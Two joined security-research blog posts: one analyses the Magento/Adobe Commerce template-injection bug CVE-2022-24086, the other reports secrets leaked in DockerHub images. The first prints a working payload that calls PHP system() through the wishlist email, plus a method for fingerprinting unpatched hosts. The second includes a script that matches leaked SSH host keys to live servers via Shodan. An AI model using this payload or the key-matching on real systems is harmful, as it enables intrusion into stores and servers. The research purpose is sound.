The vulnerability we'll be discussing today has been formally identified as 'CVE-2022-24086', a vulnerability in Adobe Commerce (or as it is also known, Magento).

Regular readers might remember a previous post on the topic of the Text4Shell bug (and subsequent follow-up), where we talked about string interpolation and how it can be leveraged to achieve code execution. Today's post speaks of another problem caused, at the root, by the same thing - unsafe string interpolation.

CVE-2022-24086, is an "Improper Input Validation Vulnerability" in Adobe Commerce 2.4.3-p1, as advised by MITRE. If abused and exploited correctly, it allows remote code execution without any user interaction, and worse, Adobe advise that they are aware of in-the-wild exploitation. Clearly a pretty serious bug.

Adobe Commerce is a hugely popular e-commerce platform. While on the surface, it appears simple - a CMS with some added cart/checkout functionality - the truth is that it is a large, complex application, allowing advanced operations such as templating items based on properties, management of multiple sites, and a particularly comprehensive customisation and templating engine.

But How Does It Work?

This customisation engine allows almost everything imaginable, from changing text elements on the website all the way to writing custom plugins. To see how it works, we can simply take a look at some of the default pages, which use the engine extensively. I picked vendor/magento/theme-frontend-luma/Magento_Email/email/footer.html which contains a simple example:

<p class="address">
	{{var store.formatted_address|raw}}
</p>

A simple variable substitution

When we look at the webpage, we see the formatted store address. Magento has processed the line inside the curly braces, and produced some output.

While this is a simple example, the language used for this customisation is surprisingly complex (see the documentation) and allows for an almost limitless range of behaviour beyond simple text substitution. Typically, though, this functionality not exposed to end-users directly - rather, site staff use the templating engine to configure the store itself. For example, a salesperson could devise an email template to be sent to prospective buyers, and use variable substitution to insert the particulars of the recipient along with a product they may be interested in.

There are a few exceptions to this 'staff-only' rule, however, and this is where things start to get interesting, as they allow an unprivileged attacker to make use of the templating engine.

One such exception is in the 'Wishlist' module, which is designed to allow an end-user of the store to create a list, of items they wish for, which can then be shared via email. What makes it interesting to us is one seemingly-minor detail - the templating engine runs on the outgoing email before it is sent. Let's explore this functionality a little bit more.

But Why?

Firstly, we'll do a simple variable substitution. We create a wishlist on a Magento site, and then request that the wishlist is shared via email to an address we control. Since we can specify the body of the email we send, we'll be specifying the body to be hello {{var store.frontend_name}} world. Let's see what's actually sent in the email:

root@host:/# postcat -qb 85FC5CBD35| grep hello
m test test:</h3>=0A            hello Main Website Store world=0A      =20=

As any astute reader can see, the injected variable was substituted with the name of the store - "Main Website Store".

This confirms we've got access to the system templating engine as a non-administrative user. But what can we do with it? Well, maybe we could experiment and see if we could read out sensitive information such as database credentials. But why? Why limit ourselves? It turns out we can set our sights even higher than this, due to the (perhaps unintended?) power of the templating engine.

Arbitrary Code Execution

As you'll recall from previous mentions of string interpolation bugs, the 'smoking gun' that really enables useful exploitation is the ability to execute arbitrary commands from an interpolated value. This is at the core of any bug in this class, and CVE-2022-24086 is no different, although slightly more complicated to figure out.

The functionality hinges on two functions exposed to the templating engine - getTemplateFilter and addAfterFilterCallback. The first will allow us to get a reference to a 'filter' object, which is used to transform incoming data before processing, and the second allows us to attach a PHP function to it (!). This is intended to be used by plugin developers to sanitise and transform user input, deferring processing to PHP code either in the Magento application itself or an administrator-provided PHP-language plugin.

It's actually easier to demonstrate this than it is to explain it, so here's a quick example:

{{var this.getTemplateFilter().filter('test')}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(touch${IFS}/tmp/test)}}

Note the use of the ${IFS} operator to avoid whitespace in the argument.

This will obtain a reference filter named 'test', and then attach a callback to it, instructing it to execute the 'system' PHP command with the arguments 'touch /tmp/test'. Running this query yields evidence that our command has executed on the server:

root@host:/bitnami/magento# ls /tmp/test -l
-rw-rw-r-- 1 daemon daemon 0 Feb 26 21:07 /tmp/test

Good news for attackers, bad news for defenders.

In the real-wordl, this is much more nefarious - within the watchTowr Platform, we deliver a second-stage payload - and all the bad guys out there could be delivering reverse shells. Indeed, this is what we've seen when the bug is exploited in the wild.

It's worth noting that the 'wishlist' module is not the only module to expose the templating engine to untrusted users. We've noted that across our client base, and in attacks seen in-the-wild, exploitation is usually best aimed at the checkout process rather than the 'wishlist' module - perhaps since the wishlist might not be present on all installations?

Fingerprinting EOL'ed installations

For many people, this is the end of the story - the bug has been analysed, a PoC has been created, and we have a good understanding of what's going on. But for us here at watchTowr, the story is just beginning - we secure our clients and detect exploitable deployments of Adobe Commerce before they are exploited, which means we must detect at scale as rapidly as possible.

While we are not here to arm everyone, there are trivially identifiable exploitable instances, such as those running End-Of-Life versions of Magneto. Since no patch is available, these installations are almost certainly vulnerable.

As a demonstration, let's take a look at some hosts on the Internet and see how we can detect these EOL'ed versions, and also look at the kind of version distribution we see.

We start off with a quick Shodan search for the X-Magento-Vary header, which Magento helpfully emits on every HTTP response. This search detects 12,500 Magento installs, and to keep things manageable, we'll confine our work to the first 1000.

The obvious solution is to observe the Magneto version number, but Magneto makes this very difficult to do. Rather than reveal the full version of the software (such as 1.2.3p4), Magneto exposes only the major and minor versions. This is done via the /Magneto_version endpoint. While this is not a high level of detail, it allows us to quickly detect instances running 2.3 and below (at the time of writing, anything below 2.4.4 is EOL).

Note that since this is a single HTTP response, it is very easy for us to scale (for example, via a Nuclei template).

Running this on our 1000 hosts gives the following breakdown:

Magneto/2.1: 12 (1.2%)
Magneto/2.2: 40 (4%)
Magneto/2.3: 212 (21%)
Magneto/2.4: 302 (30%)
Other: 566 (56%)

Our single request has quickly determined that a whopping 25% of hosts are running an outdated version of Magneto and require further attention.

The remaining 75% of installations aren't necessarily safe, however. As I mentioned, versions below 2.4.4 are (at the time of writing) EOL. A number of hosts running these versions may be hiding in the 30% of hosts which report "Magneto/2.4".

Magneto is very averse to revealing this information, however, and so we are forced to turn to more 'sneaky tricks' - in this case, fingerprinting static resources. After some investigation, we found that one change introduced in 2.4.4 is the upgrade of the tinymce package, from version 4 to version 5. This seemingly-unrelated change is actually very easy to detect - we can simply requested the tinymce static resource ( /static/adminhtml/Magento/backend/en_US/tiny_mce_5/tinymce.min.js) and if it is not present, we know that the host is running a version lower than v2.4.4, and is thus EOL'd. Let's take a look at how these versions are present on our 1000-host sample:

tinymce 4 present (probably < 2.4.4): 415 hosts (41%)
tinymce 5 present (probably <= 2.4.4): 230 hosts (23%)
None present (indeterminate): 355 (35%)

This has found a further 41% of our hosts which are running EOL'd software and are thus almost certainly of importance to the owners.

Conclusion

This kind of 'interpolation' bug is interesting from a technical standpoint, but is also often difficult to detect in real-world codebases. This instance is particularly damaging due to its pre-auth exploitability, and the huge installation base of Adobe Commerce - combined with the the valuable data typically held

We took a look at the bug itself, showing how it can be exploited (and, by extension, how you can confirm if your hosts are vulnerable). While we used the 'Whislist' functionality as an attack vector, in-the-wild attacks use the more generic 'Checkout' functionality.

Finally, we've also demonstrated how to perform a fast sweep of the public Internet, and found that around a whopping 40% of hosts are running outdated software. Hopefully, they are honeypots and not production instances!

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

watchTowr Labs - Blog
What Does This Key Open? - Docker Container Images (4/4)Aliz Hammond
23 February 2023 at 02:22

What Does This Key Open? - Docker Container Images (4/4)

watchTowr Labs - Blog

By: Aliz Hammond

23 February 2023 at 02:22

What Does This Key Open? - Docker Container Images (4/4)

This post is the fourth part of a series on our recent adventures into DockerHub. Before you read it, you may be interested in the previous instalments, which are:

If you recall our previous posts, so far we've achieved quite a lot - we've found a way to fetch a large amount of data from DockerHub efficiently, worked out how to store it in a proper relational database, and ended up with over 30 million files which we now need to scan for sensitive information.

This is no easy task at this scale. In this post, we'll talk about how we went about this task, mutating open-source software to build our own secret discovery engine. We'll then talk about the thousands of secrets that we found, and share some insights into exactly where the secrets were exposed - because well, it seems everyone does this.

As you will likely gather throughout this exercise, we began to conclude that our findings were limited only by our imagination.

For anyone wondering - no, we won't be sharing actual secrets in this blogpost.

Leveraging Gitleaks

Our secret discovery engine is based on the open-source tool Gitleaks. This provides a great basis for our work - it's designed to run on developer workstations, and integrate with Git to scan source code for secret tokens a developer may otherwise inadvertently commit to a shared source control system. It can also operate on flat files, without Git integration.

It has some neat features - for example, it is able to recognise the structure of many access tokens (such as AWS access keys, which always begin with four characters specifying their type). It also measures the entropy of potential secrets, which is useful to find secure secrets that have been generated randomly while ignoring false positives such as '1111111'.

However, it is clear that the software was not designed with our specific scenario (batch scanning of millions of files) in mind.

We ran into some trivial problems when first exploring - for example, invoking Gitleaks with a commandline similar to the following:

$ gitleaks detect --no-git --source /files/file1 --source /files/file2

While I expected this command to scan both files specified, the actual behaviour was to scan only the final file specified, ignoring the first! Fortunately, Gitleaks is open source, and so modifying it within our architecture handle collections of files, archives and more wasn't a problem.

A second problem, this time impacting performance, rears its head when Gitleaks detects with a large amount of secrets. Gitleaks will keep a slice and append detected secrets to it, but for very large amounts of secrets, this approach causes high CPU load and memory fragmentation, so it is best to preallocate this array.

With these tweaks, we're ready to use our mutated Gitleaks-based engine to find secrets. We created a table in the database for holding results for our analysis, and used a number of ec2 nodes to fill it.

Falsely Positive

Of course, when dealing with a fileset of this size, false positives are an inevitability. These fall into two main categories.

Firstly, tokens which are clearly not intended for production use. For example, the python crypto package ships with tests which use static keys. These keys are, for our purposes, 'well known', and should not be included in our output. While it is tempting to ignore these completely, we store them in the database, but mark them as 'well known'. This allows us to build a dictionary of 'well known' secrets for future projects.

Secondly, various items of text will be detected by Gitleaks despite being clearly not access keys. For example, consider the following C code:

unsigned char* key = "ASCENDING";

Gitleaks ships with a module that would classify this as a secret token, since it is assigned to a value named key.

We decided to mitigate both of these categories using filters on the name of the file in question. While Gitleaks includes functionality to do this, our use of a database and the one-to-many relationship between files and filenames complicates things, and so we use Python to match filenames after scanning.

Filename Ignore-Listing

Since a large amount of files are being ignored, and because we wanted fine-grained control over them, we were careful when designing the system that assesses if a given filename was 'well known' or not.

We decided on a file format for holding regular expressions with entries similar to the following:

  -
   pattern: .*/vendor/lcobucci/jwt/test/unit/Signer/RsaTest\.php
   mustmatch:
     - /var/www/html/vendor/lcobucci/jwt/test/unit/Signer/RsaTest.php

Here, we can see a pattern which is matched, and we can also see a test string, in the 'mustmatch' array. Before analysis is started, the regular expression is tested against this test string, and if no match is found, an error is found. While not helpful for simple expressions like the one shown, this is invaluable when attempting more complex patterns:

 -
   pattern: .*?/(lib(64)?/python[0-9\.]*/(site|dist)-packages/|.*\.egg/)Cryptodome/SelfTest/(Cipher|PublicKey|Signature)(/__pycache__)?/(test_pkcs1_15|test_import_RSA|test_import_ECC|test_pss)(\.cpython-[0-9]*)?\.(pyc|py)
   mustmatch:
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Cipher/test_pkcs1_15.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/PublicKey/test_import_RSA.pyc
     - /galaxy_venv/lib/python2.7/site-packages/Cryptodome/SelfTest/PublicKey/test_import_ECC.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Signature/test_pkcs1_15.pyc
     - /usr/local/lib/python2.7/site-packages/Cryptodome/SelfTest/Signature/test_pss.py
     - /usr/local/lib/python3.7/site-packages/Cryptodome/SelfTest/Cipher/__pycache__/test_pkcs1_15.cpython-37.pyc
     - /usr/local/lib/python3.6/dist-packages/pycryptodomex-3.9.8-py3.6-linux-x86_64.egg/Cryptodome/SelfTest/Signature/test_pss.py

In addition, separate tests ensure 'true positive' detections occur, by scanning known-interesting files and ensuring that a detection is raised appropriately.

Context-Aware Ignore-Listing

While filename-based ignoring is a great help, there are a few specific instances where it falls short. For example, text similar to the following appears often in dmesg output:

[    0.630554] Loaded X.509 cert 'Magrathea: Glacier signing key: 00a5a65759de474bc5c43120880c1b94a539f431'

Gitleaks will helpfully alert us of this, believing the key to be sensitive information. In reality, it is simply a fingerprint, and useless to an attacker. Since there are a lot of keys in use, it is impractical to list all that we are not interested in, and so we use a regex to isolate the secret and ensure it does not occur in these strings:

regex:
  -
    pattern: ".*Loaded( X\\.509)? cert '.*: (?P<secret>.*)'"
    mustmatch:
     - "Mar 08 12:58:16 localhost kernel: Loaded X.509 cert 'Red Hat Enterprise Linux kpatch signing key: 4d38fd864ebe18c5f0b72e3852e2014c3a676fc8'"
     - "MODSIGN: Loaded cert 'Oracle America, Inc.: Ksplice Kernel Module Signing Key: 09010ebef5545fa7c54b626ef518e077b5b1ee4c'"

Note the use of a named capture group - named 'secret' - which is compared to the secret that Gitleaks detects. If this expression matches, the detection is considered 'well known'.

SSH Keypairs

One datapoint with a low false-positive rate and high impact is the number of SSH private keys found in publically accessible DockerHub repositories. Since our mutated engine is able to recognise these, it is easy to identify them (although some work must be done to remove example keys).

We locate a very large number of these files - 54169, to be exact:

+-----------------------------------+----------+-------------------------+
| description                       | count(*) | count(distinct(secret)) |
+-----------------------------------+----------+-------------------------+
| Private Key                       |    54169 |                    9693 |
+-----------------------------------+----------+-------------------------+

But many of them are of no consequence. Taking a look at the filenames, for example, we can immediately discard 2329 self-signed CA files:

mysql> select filename, count(*) from gitleaksArtifacts 	\
	where Description = "Private Key"						\
    group by filename 										\
    order by count(*) desc 									\
    limit 10;
+-----------------------+----------+
| filename              | count(*) |
+-----------------------+----------+
| rsa.2028.priv         |     2745 |
| ssl-cert-snakeoil.key |     2329 |
| server.key            |     1972 |
| http_signing.md       |     1488 |
| pass2.dsa.1024.priv   |     1350 |
| ssh_host_rsa_key      |     1219 |
| ssh_host_dsa_key      |     1063 |
| ssh_host_ecdsa_key    |     1016 |
| ssh_host_ed25519_key  |      897 |
| server1.key           |      805 |
+-----------------------+----------+

The presence of files prefixed with ssh_host, however, is interesting, as such host keys are considered sensitive. Let's look at them more closely:

mysql> select filename, count(*) from gitleaksArtifacts \
	where Description = "Private Key"  					\
    and filename like 'ssh_host_%_key' 					\
    group by filename 									\
    order by count(*);
+-----------------------+----------+
| filename              | count(*) |
+-----------------------+----------+
| ssh_host_ecdsa521_key |        1 |
| ssh_host_ecdsa256_key |        1 |
| ssh_host_ecdsa384_key |        1 |
| ssh_host_ed25519_key  |      897 |
| ssh_host_ecdsa_key    |     1016 |
| ssh_host_dsa_key      |     1063 |
| ssh_host_rsa_key      |     1219 |
+-----------------------+----------+

These 4198 files, spanning 611 distinct images, should probably not be exposed to the public. However, we can actually take things one step further, and verify if any hosts on the public Internet are using these keys.

Enter: Shodan

You may be familiar with Shodan.io, which gathers a wealth of banner information from various services exposed to the public Internet. One feature is provides is the ability to search by fingerprint hash, which we can calculate easily from the private keys we fetched above.

Shodan provides a straightforward API, so our key-locating application is simple to write. Most of the code is in manipulating private keys to find the corresponding public key, and thus the hash.

shodanInst = shodan.Shodan('<your API key here')

for artifact in self.db.fetchGitleaksArtifacts():
	if artifact.description == 'Private Key':
		try:
			# Convert this into a public key and get the hash.
			keyAsc = artifact.secret
			keyAsc = re.sub( re.compile("\s*?-*(BEGIN|END).*?PRIVATE KEY-*\s*?"), "", keyAsc)
			keyAsc = keyAsc.replace('"', "")
			keyBinary = base64.b64decode(keyAsc)
			keyPriv = RSA.importKey(keyBinary)
		except binascii.Error:
			continue
		except ValueError:
			continue
    	keyPublic = keyPriv.publickey()
        
		# Export to OpenSSH format, snip off the prefix, and b64-decode it
		pubKeyBytes = base64.b64decode( 		
        	keyPublic.publickey().exportKey('OpenSSH').split(b' ')[1]
        )
		# We can then hash this value to find the key hash.
		hasher = hashlib.md5()
		hasher.update(pubKeyBytes)
		pubHash = hasher.digest()
		pubHashStr = ":".join(map(lambda x: f"{x:02x}", pubHash))

		# Now we can do the actual search.
		shodanQuery = f'Fingerprint: {pubHashStr}'
		result = shodanInst.search(shodanQuery)
		for svc in result['matches']:
			db.insertArtifactSighting(
            	artifact.fileid, 
                str(ipaddress.ip_address(svc['ip']))
            )

This query yields very interesting results, although not what we expect. We see 742 matches, over 690 unique IP addresses, but what is most interesting is the specific keys they use:

mysql> select  concat(artifact_path.path,  '/', artifacts.filename), count(distinct(ipaddress)) from artifactsOnline join artifacts on artifacts.id = artifactsOnline.fileid join artifact_path on artifact_path.id = artifacts.pathid  join artifactHashes on artifactHashes.id = artifacts.hashID  where path not like '/pentest/exploitation%' group by concat(artifact_path.path,  '/', artifacts.filename)  order by count(distinct(ipaddress));
+-------------------------------------------------------------------------------------------+----------------------------+
| concat(artifact_path.path,  '/', artifacts.filename)                                      | count(distinct(ipaddress)) |
+-------------------------------------------------------------------------------------------+----------------------------+
| /etc/ssh/ssh_host_rsa_key                                                                 |                         27 |
| /usr/local/lib/python2.6/dist-packages/bzrlib/tests/stub_sftp.pyc                         |                         23 |
| /usr/lib64/python2.7/site-packages/bzrlib/tests/stub_sftp.pyo                             |                         23 |
| /usr/lib/python2.7/site-packages/bzrlib/tests/stub_sftp.py                                |                         23 |
| /usr/lib/python2.7/site-packages/bzrlib/tests/stub_sftp.pyc                               |                         23 |
| /usr/lib64/python2.7/site-packages/bzrlib/tests/stub_sftp.pyc                             |                         23 |
| /usr/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                            |                          6 |
| /usr/share/doc/python-twisted-conch/howto/conch_client.html                               |                          6 |
| /usr/local/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                      |                          6 |
| /usr/local/lib/python2.7/dist-packages/twisted/conch/test/keydata.py                      |                          6 |
| /usr/local/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.pyc                      |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/test/keydata.py                            |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.pyc                            |                          6 |
| /usr/lib/python2.7/dist-packages/twisted/conch/manhole_ssh.py                             |                          6 |
| /root/.local/lib/python2.7/site-packages/twisted/conch/manhole_ssh.pyc                    |                          6 |
| /usr/local/lib/node_modules/piriku/node_modules/ssh2/test/fixtures/ssh_host_rsa_key       |                          4 |
| /usr/local/lib/node_modules/strongloop/node_modules/ssh2/test/fixtures/ssh_host_rsa_key   |                          4 |
| /app/code/env/lib/python3.8/site-packages/synapse/util/__pycache__/manhole.cpython-38.pyc |                          2 |
| /app/code/env/lib/python3.8/site-packages/synapse/util/manhole.py                         |                          2 |
| /tmp/mtgolang/src/github.com/mtgolang/ssh2docker/cmd/ssh2docker/main.go                   |                          1 |
+-------------------------------------------------------------------------------------------+----------------------------+

It seems that a large amount of hosts are using example keys as shipped with various Python packages. This is an interesting finding in itself, and something we may examine in a later blog post.

We can also see the host key for a tomcat installation being used on 82 individual docker images - that's more like what we expected to see. This verifies that these keys are sensitive, and "double-confirms", as we say here in Singapore, that they should not be disclosed.

Social Media

Social media keys were also present in the dump. Let's take a look:

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Twilio API Key                   |      220 |                       3 |
| Facebook                         |       27 |                      12 |
| LinkedIn Client ID               |       18 |                       6 |
| LinkedIn Client secret           |       16 |                       6 |
| Twitter API Key                  |        9 |                       6 |
| Twitter API Secret               |        7 |                       5 |
| Flickr Access Token              |        3 |                       2 |
| Twitter Access Secret            |        1 |                       1 |
+----------------------------------+----------+-------------------------+

Of the 27 Facebook keys, one appears to be invalid, consisting of all zeros. There are 11 unique keys which appear valid.

One of the Flickr access tokens is located in a file named /workspace/config.yml. This file contains (in addition to the detected Flickr token) what appear to be valid credentials to Amazon AWS, Instagram, Google Cloud Vision, and others.

Likewise, while examining the detections for Twitter secrets, we find only a few keys, but the files containing these keys also include AWS tokens, a SendGrid API keys, slack tokens, SalesForce tokens, and others.

mysql> select distinct(filename), count(*) from gitleaksArtifacts \
	where description like 'Twitter%' \
    group by filename \
    order by count(*) desc;
+---------------------+----------+
| filename            | count(*) |
+---------------------+----------+
| .env.example        |        6 |
| settings.py         |        3 |
| GenericFunctions.js |        2 |
| DVSA-template.yaml  |        2 |
| development.env     |        2 |
| twitter.md          |        2 |
+---------------------+----------+

It is very clear that keys and tokens often 'cluster' together in the same file.

Stripe Payment Processor Keys

The payment processor 'Stripe' has a lot of structure in its tokens, and so finding them is particularly easy. Our mutated engine located 88 unique secrets:

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Stripe                           |     1563 |                      88 |
+----------------------------------+----------+-------------------------+

Here's the first three of them, to show just how much structure is present.

mysql> select concat(path, '/', filename), 				\
	gitleaksArtifacts.secret from gitleaks_result 		\
    join gitleaksArtifacts on 							\
    gitleaksArtifacts.fileid = gitleaks_result.fileid 	\
    where 												\
    gitleaks_result.description = 'Stripe' 				\
    and isWellKnown = 0									\
    order by gitleaksArtifacts.hash						\
    limit 3;
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
| concat(path, '/', filename)                 | secret                                                                                                      |
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
| /app/code/packages/server/stripeConfig.json | pk_live_51IvkOPLx4fyREDACTEDREDACTED                                                                    |
| /app/code/packages/server/stripeConfig.json | pk_test_51IvkOPLx4fybOTqJetV23Y5S9REDACTEDREDACTED |
| /app/code/packages/server/stripeConfig.json | pk_test_51IvkOPLx4fybOTqJetV2REDACTEDREDACTED                                                                    |
+---------------------------------------------+-------------------------------------------------------------------------------------------------------------+
3 rows in set (0.56 sec)

Note the leading pk_ or sk_, identifying a 'public key' (which is not sensitive) or a 'secret key', which is sensitive. Our dataset contains 47 unique private pk_ keys and 41 unique sk_ keys.

Of the 88 unique credentials we see, 35 appeared to be the secret key corresponding to test credentials (starting with the string sk_test), and six appeared to be 'live', starting with the string sk_live. Ouch!

Google Compute Platform (GCP) Keys

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| GCP API key                      |      411 |                      89 |
+----------------------------------+----------+-------------------------+

While we found a large amount of keys for the Google Compute Platform, it should be noted that it is difficult to ascertain the level of permission available to the keys. We estimate that a portion of these keys are intended for wide-scale public deployment; for example, those for crash-reporting, which are configured to allow anonymous uploads but little else.

Amazon Web Services (AWS) Keys

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| AWS                              |   139362 |                   42095 |
+----------------------------------+----------+-------------------------+

Again, it is difficult to ascertain the privileges associated with these forty-two thousand unique keys, and thus if they are truly sensitive or not.

Examining them individually does yield some context that helps, although it is not practical to do this at scale.

One thing that may interest readers is the location in which these keys were found. Three were located in the .bash_history file belonging to the superuser, indicating that these files had been improperly cleaned. Eleven other keys were found in improperly sanitized log files, and two in backups of MySQL database content.

Database Dumps

One of the custom detections we added to our mutated engine was to detect dumps of database information produced by the mysqldump tool. We applied this filter only to a quarter of the dataset, and found a large amount of these files - almost 400.

While some of them were installation templates, there were also some which contained live data:

mysql> select \
	distinct(concat(artifact_path.path, '/', artifacts.filename)), 	\
    artifacts.filesize \
    from gitleaksArtifacts 
    join artifacts on artifacts.id = gitleaksArtifacts.fileid \
    join artifact_path on artifact_path.id = artifacts.pathid \
    where description = 'Possible database dump' \
    order by filesize desc \
    limit 25;
+---------------------------------------------------------------------------------+----------+
| (concat(artifact_path.path, '/', artifacts.filename))                           | filesize |
+---------------------------------------------------------------------------------+----------+
| /docker-entrypoint-initdb.d/zmagento.sql                                        | 72135471 |
| /docker-entrypoint-initdb.d/bitnami_mediawiki.sql                               | 10913302 |
| /app/wordpess.sql.bk                                                            |  5321931 |
| /var/www/html/sql/stackmagento.sql                                              |  5224835 |
| /var/www/html/sql/stackmagento.sql                                              |  4379391 |
| //ogAdmBd.sql                                                                   |  1046438 |
| //all-db.ql                                                                     |   918670 |
| /var/www/html/backup.sql                                                        |   703961 |
| /tmp/db.sql                                                                     |   683875 |
| /var/www/html/cphalcon/tests/_data/schemas/mysql/mysql.dump.sql                 |   603179 |
| /opt/cphalcon-3.1.x/tests/_data/schemas/mysql/mysql.dump.sql                    |   603179 |
| /cphalcon/unit-tests/schemas/mysql/phalcon_test.sql                             |   597577 |
| /usr/local/src/cphalcon/unit-tests/schemas/mysql/phalcon_test.sql               |   597577 |
| /usr/local/src/cphalcon/unit-tests/schemas/mysql/phalcon_test.sql               |   596903 |
| //allykeys.sql                                                                  |   423963 |
| /ECommerce-Java/zips.sql                                                        |   399288 |
| /app/code/database/setup.sql                                                    |   379063 |
| //dump.sql                                                                      |   366901 |
| /tmp/hhvm/third-party/webscalesqlclient/mysql-5.6/mysql-test/r/mysqldump.result |   285948 |
| /home/pubsrv/mysql/mysql-test/r/mysqldump.result                                |   229737 |
| /usr/share/mysql-test/r/mysqldump.result                                        |   223161 |
| /usr/share/zoneminder/db/zm_create.sql                                          |   218651 |
| /home/SOC-Fall-2015/ApacheCMDA-Backend/DBDump/Dump20150414.sql                  |   191648 |
| /home/apache/ApacheCMDA/ApacheCMDA-Backend/DBDump/Dump20150414.sql              |   191648 |
| /opt/mysql-backup/tmp/ubuntu-backup-2016-09-30-08-13-34.sql                     |   106985 |
+---------------------------------------------------------------------------------+----------+
25 rows in set (2.29 sec)

Browsing some of these files, we spotted credentials for a variety of CMSs, and more.

And then just.. others..

Our mutated engine matched a large amount of other keys, and just in general - bad things(tm).

+----------------------------------+----------+-------------------------+
| description                      | count(*) | count(distinct(secret)) |
+----------------------------------+----------+-------------------------+
| Generic API Key                  |   941621 |                   94533 |
| Database connection string       |    32257 |                    3797 |
| JSON Web Token                   |     1817 |                     154 |
| Etsy Access Token                |      506 |                      12 |
| Linear Client Secret             |      386 |                      12 |
| Slack Webhook                    |      231 |                      32 |
| Slack token                      |      120 |                      22 |
| EasyPost test API token          |       95 |                      28 |
| EasyPost API token               |       83 |                      28 |
| Bitbucket Client ID              |       27 |                       3 |
| GitHub Personal Access Token     |       16 |                       2 |
| Airtable API Key                 |       16 |                       5 |
| Dropbox API secret               |       13 |                       7 |
| Plaid Secret key                 |       12 |                       2 |
| SendGrid API token               |       12 |                       7 |
| Sentry Access Token              |       12 |                       6 |
| GitHub App Token                 |       12 |                       1 |
| Algolia API Key                  |       11 |                       4 |
| Alibaba AccessKey ID             |        7 |                       3 |
| Plaid Client ID                  |        6 |                       1 |
| HubSpot API Token                |        6 |                       4 |
| Heroku API Key                   |        6 |                       1 |
| GitLab Personal Access Token     |        6 |                       3 |
| Mailgun private API token        |        4 |                       4 |
| SumoLogic Access ID              |        4 |                       2 |
| Lob API Key                      |        3 |                       1 |
| Atlassian API token              |        3 |                       1 |
| Mailgun webhook signing key      |        2 |                       1 |
| Grafana service account token    |        2 |                       1 |
| Asana Client Secret              |        2 |                       2 |
| Grafana api key                  |        1 |                       1 |
| Dynatrace API token              |        1 |                       1 |
+----------------------------------+----------+-------------------------+

Of most interest is the 'Generic API Key' rule. Unfortunately it is especially prone to false-positives, but due to its wide scope, it is able to detect secrets that other detection rules miss. For example, we found it located secrets in .bash_history files, and web access logs, to name a couple. For example, it found the following credit card information, which was thankfully non-sensitive since it had been sanitised:

[2016-05-02 18:43:07] main.DEBUG: TODOPAGO - MODEL PAYMENT - Response: {"StatusCode":-1,"StatusMessage":"APROBADA","AuthorizationKey":"<watchtowr redacted>","EncodingMethod":"XML","Payload":{"Answer":{"DATETIME":"2016-05-02T15:43:01Z","CURRENCYNAME":"Peso Argentino","PAYMENTMETHODNAME":"VISA","TICKETNUMBER":"12","AUTHORIZATIONCODE":"REDACTED","CARDNUMBERVISIBLE":"45079900XXREDACTED","BARCODE":"","OPERATIONID":"000000001","COUPONEXPDATE":"","COUPONSECEXPDATE":"","COUPONSUBSCRIBER":"","BARCODETYPE":"","ASSOCIATEDDOCUMENTATION":""},"Request":{"MERCHANT":"2658","OPERATIONID":"000000001","AMOUNT":"50.00","CURRENCYCODE":"32","AMOUNTBUYER":"50.00","BANKID":"11","PROMOTIONID":"2706"}}} {"is_exception":false} []

Other files were found via inventive filename searches; a search for wallet.dat yields six files, for example.

At this point, it seems our discoveries are limited only by our imagination.

File Metadata

In addition to logging the contents and name of files, we also log the UNIX permission bits. This allows us to query for unusual or (deliberately?)-weak configurations. The following query will list all SUID files found on all systems, and all their paths, yielding 325 results:

mysql> select distinct(filename) 	\
	from artifacts 					\
    where ownerUID = 0 				\
    and perm_suid = '1' 			\
    order by filename;

The results are interesting, including a number of classic 90's-era security blunders. For example, some containers ship with world-writable SUID-root files (426 files in total):

mysql> select concat(path, '/', filename), hash 					\
		from artifacts												\
		join artifact_path on artifact_path.id = artifacts.pathid	\
		join artifactHashes on artifactHashes.id = artifacts.hashid	\
		where perm_suid = '1'										\
		and perm_world_w = '1'										\
		order by filename

Also present are various SUID-root shell scripts, which are notoriously difficult to secure:

mysql> select path,filename,hash 									\
	from artifacts 													\
    join artifact_path on artifact_path.id = artifacts.pathid 		\
    join artifactHashes on artifactHashes.id = artifacts.hashID		\
    where perm_suid = '1' 											\
    and perm_world_w = 1  											\
    and filename like '%.sh'										\
    limit 10;
+-----------------------------+----------------+------------------------------------------+
| path                        | filename       | hash                                     |
+-----------------------------+----------------+------------------------------------------+
| /opt/appdynamics-sdk-native | env.sh         | fcd22cc86a46406ead333b1e92937f02c262406a |
| /opt/appdynamics-sdk-native | install.sh     | 03f39f84664a22413b1a95cb1752e184539187cb |
| /opt/appdynamics-sdk-native | runSDKProxy.sh | fb37a2ef8b28dbb20b9265fe503c5e966e2c5544 |
| /opt/appdynamics-sdk-native | startup.sh     | 90db0cac34b1a9c74cf7e402ae3da1d69975f87d |
+-----------------------------+----------------+------------------------------------------+

Conclusions

I hope you've enjoyed this blog series! We had a lot of fun building the infrastructure, finding credentials to some incredibly scary things (scary), and ofcourse documenting our journey.

The main point we intend to illustrate is that it is very easy for an otherwise well-funded, careful organisation to leak secrets via DockerHub. These are not personal containers with little value, but those operated by large organisations who are for the most part, proactive in securing their information.

But in today's reality - this is a great example of today's shifting attack surface. Securing a modern organisation requires examination of a wide and varied attack surface, showing the need for organisations to proactively consider what their attack surface may have truly evolved into.

